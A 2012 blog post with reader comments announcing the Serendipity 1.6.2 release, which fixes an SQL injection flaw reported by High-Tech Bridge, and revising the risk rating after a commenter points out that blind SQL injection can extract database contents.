Serendipity 1.6.2 released

UPDATED: 2012-05-22 12:00 to clarify impact.

Good and bad things come in doubles, it seems. We are sorry to inform you that another security issue in Serendipity has been found by the High-Tech Bridge SA Security Research Lab (Advisory HTB23092). This issue has been reported today at 11:27 and we're happy to provide a quick fix for that.

You can either download the full 1.6.2 release, or apply this simple fix to the file include/ diff on github.

The error here is that input is not properly validated and can be used (when magic_quotes_gpc is off) to inject SQL code to a SQL query; since our DB layer does not execute multiple statements, and the involved SQL query is not used to produce output code. Thanks to Pawel Golen it was made clear to us that this issue can in fact be used to remotely access the database through blind sql injection attacks (this method however is really slow and creates a lot of traffic, since only using 0/1 as a result of the exploit will mean a lot of queries to deduce the content). Thus you should definitely upgrade your installation.

Serendipity is an open-source based product with no specific funding, so we depend on nice people like High-Tech Bridge, Stefan Schurtz, Hanno Böck and all the others of the past to report issues to us. In turn we promise to fix them as quickly and transparently as possible.


Trackback specific URI for this entry


Display comments as (Linear | Threaded)

Pawel Golen on at :

I can't agree with this risk rating. Blind sql injection can be used in this case to extract database content. I've checked it and it works like a charm.

ahappycustomer on at :

now i am happy that i run a 4 year old version of s9y that is not affected by this bug. thank you so much for s9y, i'm a very happy "customer" :)

and yes, i know that 1.3 had security issues since then, but those are all limited to weird extensions or being an admin if i don't miss anything.
so thanks again, this proves so much how s9y is superior to wordpress when it comes to security.

Garvin on at :

Hi Pawel! Can you explain how you achieve that? The query is only executed, and no returned data is passed along to output, so I don't exactly see how this can be used. I am not a SQL security expert, so if you can explain the situation, of course I would raise the risk assassment in that case!

Thanks for your input,

Pawel Golen on at :

I've sent you an email at blog@... with details. I hope you got it.

Garvin on at :

Thanks a lot for your specific email, now I see a lot clearer and have changed this blog text accordingly.

Add Comment

E-Mail addresses will not be displayed and will only be used for E-Mail notifications.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.

BBCode format allowed